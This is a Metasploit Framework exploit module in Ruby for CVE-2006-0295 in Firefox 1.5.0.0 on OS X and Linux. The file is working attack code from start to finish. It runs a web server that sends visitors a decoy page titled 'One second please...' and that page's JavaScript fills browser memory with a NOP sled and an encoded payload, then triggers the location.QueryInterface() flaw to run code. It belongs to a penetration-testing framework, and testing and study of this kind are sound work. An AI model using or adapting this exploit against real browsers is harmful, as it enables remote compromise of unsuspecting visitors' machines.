GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/firefox_queryinterface.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # Declares the module metadata: name, description, references (CVE-2006-0295,
  # the MFSA 2006-04 advisory), payload constraints, the two supported targets
  # (Firefox 1.5.0.0 on OS X/PPC and on Linux/x86) and the disclosure date.
  #
  # @param info [Hash] extra module info merged in via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Firefox location.QueryInterface() Code Execution',
        'Description' => %q{
          This module exploits a code execution vulnerability in the Mozilla
          Firefox browser. To reliably exploit this vulnerability, we need to fill
          almost a gigabyte of memory with our nop sled and payload. This module has
          been tested on OS X 10.3 with the stock Firefox 1.5.0 package.
        },
        'License' => MSF_LICENSE,
        'Author' => ['hdm'],
        'References' => [
          ['CVE', '2006-0295'],
          ['OSVDB', '22893'],
          ['BID', '16476'],
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
        ],
        # Payload space is picked once per module instantiation as
        # 1000 + 4 * rand(256), i.e. 1000..2020 bytes in 4-byte steps, so the
        # encoded payload length varies between runs. NUL is excluded because
        # the payload travels inside a JavaScript string.
        'Payload' => {
          'Space' => 1000 + (rand(256).to_i * 4),
          'BadChars' => "\x00"
        },
        'Targets' => [
          [
            'Firefox 1.5.0.0 Mac OS X',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC
            }
          ],

          [
            'Firefox 1.5.0.0 Linux',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ],
        ],
        'DisclosureDate' => '2006-02-02',
        # Reliability/stability/side-effect notes were never filled in for this
        # (2006-era) module; treat them as unknown rather than "clean".
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Serves the exploit page for any request that reaches the module's URI.
  #
  # The request itself is not inspected: every request gets a freshly
  # regenerated payload, the generated HTML with an explicit text/html
  # Content-Type, and then the payload handler is started for that client.
  #
  # @param cli [Object] client connection supplied by the HttpServer mixin
  # @param _request [Object] incoming request (unused)
  # @return [nil] returns early, sending nothing, if regenerate_payload
  #   yields nil for this client
  def on_request_uri(cli, _request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)).nil?)

    print_status("Sending #{name}")
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
    handler(cli)
  end

  # Builds the HTML/JavaScript document sent to the browser.
  #
  # The encoded payload and a 4-byte nop sequence are converted with
  # Rex::Text.to_unescape, using the byte order of the selected target's
  # architecture, into strings the page decodes with JavaScript unescape().
  # FillHeap() appends the nop string 1024*256 times, appends the payload once,
  # then concatenates that block 1024 times before BodyOnLoad() calls
  # location.QueryInterface(). All of the memory growth described in the module
  # description therefore happens client-side; the HTTP response itself is a
  # small, fixed-shape page whose only variable parts are the two unescape()
  # arguments.
  #
  # @param payload [Object] the regenerated payload; only #encoded is read
  # @return [String] the complete HTML document (heredoc, common indent stripped)
  def generate_html(payload)
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
    enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))

    return <<~EOF
    <html>
    <head>
    <title>One second please...</title>
    <script language="javascript">

    function BodyOnLoad() {
    h = FillHeap();
    location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
    };

    function FillHeap() {
    // Filler
    var m = "";
    var h = "";
    var a = 0;

    // Nop sled
    for(a=0; a<(1024*256); a++)
    m += unescape("#{enc_nops}");

    // Payload
    m += unescape("#{enc_code}");

    // Repeat
    for(a=0; a<1024; a++)
    h += m;

    // Return
    return h;
    }
    </script>
    </head>
    <body onload="BodyOnLoad()">
    </body>
    </html>
    EOF
  end
end